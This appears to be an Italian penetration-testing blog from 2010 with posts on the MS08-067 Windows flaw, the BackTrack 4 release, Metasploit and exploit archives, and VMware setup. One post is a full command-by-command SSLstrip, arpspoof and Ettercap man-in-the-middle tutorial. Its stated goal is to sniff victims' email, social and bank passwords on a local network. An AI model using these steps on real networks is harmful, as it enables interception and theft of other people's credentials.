martedì 12 gennaio 2010

ExploitMs08_067 con FrameWork 3






Questo video dimostra una famosissima vulnerabilità di Windows "ms08_067", quindi se usate ancora sistemi operativi Windows 2000 o XP fino al SP2 vi consiglio di tenerli sempre aggiornati, di installare la patch per ms08_067 sul sito della Microsoft che andrà a correggere la falla del servizio di rete e di utilizzare altri tipi di firewall non quello di windows.

Ecco il link del video su youtube EXploitMs08_067


lunedì 11 gennaio 2010

BackTrack 4 Final


Sono lieto di annunciarvi l'uscita di BackTrack 4 Final, scaricabile dal suo nuovo sito BackTrack Linux, un sito dalla grafica stupenda e ricco già di tutorial, con il suo nuovo blog e forum. Visitatelo e buon divertimento a tutti con la BackTrack 4.



domenica 10 gennaio 2010

Ssl-Strip con Ettercap

SslStrip assieme ad Ettercap permette di sniffare password durante l'accesso in siti con cifratura ssl, siti che dovrebbero essere sicuri ad un eventuale attacco, quindi se un malintenzionato entra nella vostra rete privata, dovuta ad una mancanza di protezione della vostra rete wireless, potrebbe venire in possesso dei vostri account email e password di hotmail, gmail, facebook e anche bancari. Illustrerò la configurazione di SsLStrip corredata di video dimostrativo pubblicato su youtube da Backtrack.it dove potete vedere altri stupendi video dimostrativi come quelli per Ettercap, questo è un tutorial dimostrativo non mi assumo nessuna responsabilità per un eventuale uso illegale.

Rileviamo la nostra interfaccia di rete wireless o ethernet

root@morfes:~# ifconfig wlan1

configuriamo gli iptables del nostro firewall

root@morfes:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@morfes:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

effettuiamo con nmap una scansione dei range degli ip della nostra rete partendo dall'ip del router, per poter trovare l'ip del nostro pc vittima

root@morfes:~# nmap 192.168.1.1-254

avviamo arpspoof
è mettiamo l'interfaccia di rete, l'ip vittima e l'ip del router

root@morfes:~# arpspoof -i wlan1 -t 192.168.1.101 192.168.1.1

avviamo sslstrip da un'altro terminale è digitiamo

root@morfes:~# sslstrip -a

sempre da shell avviamo ettercap
, ma prima dobbiamo modificare il file di configurazione di etter.conf in /etc/ ovviamente logati da root cosi:

# if you use ipchains:
#redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
#redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

togliendo i #

# if you use ipchains:
redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

adesso avviamo ettercap e digitiamo

root@morfes:~# ettercap -T -q -i wlan1

da questo momento in poi quando entriamo nei nostri account email dal pc vittima, sniffiamo tutte le password! :)




MetasploitFramework - Milw0rm - Exploitdb


Metasploit Framework è un progetto realizzato per fornire informazioni sulle vulnerabilità, rilevamento di intrusioni e per semplificare le operazioni di penetration testing. Metasploit si divide in due progetti framework2 e framework3, il 2 è stato abbandonato. Framework è un insieme di strumenti per lo sviluppo e l'esecuzione di exploits, shellcodes, auxiliary e opcode, per maggiori informazioni visitate il sito di Metasploit, invece per una guida in italiano visitate il sito di Backtrack.it, qui troverete un file in pdf che spiega l'utilizzo di Metasploit e altre interessanti guide come quella di Milw0rm. Potete anche seguire il corso online di Metasploit Unleashed offerto dal team di Offensive Security.




Milw0rm è un sito che archivia tutte le vulnerabilità, exploits e shellcodes appena scoperti, un punto di riferimento per tenersi aggiornati sulle vulnerabilità dei sistemi operativi, cms e web server, ovviamente per maggiori informazioni visitate il sito di Milw0rm o la guida in pdf su Backtrack.it.




Exploitdb è il nuovo sito di archiviazione degli exploits che ha sostituito il vecchio Milw0rm, creato dall' Offensive Security visitate il sito è molto interessante Exploitdb.

Questo è tutto, ciao a tutti!

venerdì 8 gennaio 2010

Installare VMware Server su BT


Vmware Server è un potente virtual machines che permette di virtualizzare sistemi operativi sia windows che linux, è molto utile installarlo su BT4 specialmente se dobbiamo fare penetration test su più vari sistemi operativi ma abbiamo solo una o due macchine fisiche "computer". L'installazione richiede una registrazione gratuita al sito VMware per ottenere la chiave di licenza, per installarlo seguite il video dell' Offensive Security, fate molta attenzione durante l'installazione ci sono alcuni accorgimenti da effettuare rispetto al video. Inanzitutto scaricate il pacchetto vmware-server.tar.gz dal sito, una copia salvatela in /tmp/vmware come da video, arrivati alla parte in cui vi chiede che interfaccia di rete volete utilizzare per l'host cioè il pc che avvierà la virtual machine quindi BT4 scegliete eth0 di default se vi collegate via cavo o mettete wlan0, wlan1 se utilizzate una scheda wifi. Completata l'installazione VMware si avvierà automaticamente come Nessus all'avvio di Bt4, utilizziamo rcconf per disattivare l'avvio automatico, per avviare e stoppare vmware diamo da shell

root@morfes:~# /etc/init.d/vmware start

root@morfes:~# /etc/init.d/vmware stop

sul browser scriviamo https://127.0.0.1:8333 per far partire l'interfaccia web di VMware Server accettiamo il certificato SSL, prima di installare il nostro sistema operativo virtuale, dobbiamo scegliere quale modalità dare al network adapter bridged o nat, io vi consiglio bridged perchè se avete attivato dal vostro router il servizio DCHP assegnerà in automatico l'indirizzo ip della vostra rete privata invece nat creererà una nuova rete privata quindi non adatta per fare penetration test, vi linko una guida che spiega il networkig della vmware server "Networking con VMWARE Server" , anche se si riferisce per la versione di windows. Installato e avviato il nostro sistema operativo virtuale, avremo problemi con la funzionalità della tastiera, infatti vmware server versione linux la keyboard non funziona bene, per risolvere il problema andiamo su /usr/lib/vmware/ e con un editor di testo "Kate" apriamo il file config e inseriamo xkeymap.nokeycodeMap = "TRUE" salviamo e avremo la tastiera funzionante tranne per il tasto "Alt Gr" che non viene riconosciuto. Questa procedura d'installazione della VMware Server credo possa funzionare anche per Ubuntu! Ciao a tutti alla prossima!





Aggiornamento


Con la nuova BT4 final la procedura per installare la VMware Server come da video non funziona, in quanto il kernel della BT4 Final è cambiato, quindi bisogna ricompilare la VMware una procedura non semplice, quindi vi consiglio di installarvi direttamente VMware Player o Workstation con questi semplici comandi:

root@morfes:~# chmod 755 VMware-Player-3.0.0-203739.i386.bundle

root@morfes:~# ./VMware-Player-3.0.0-203739.i386.bundle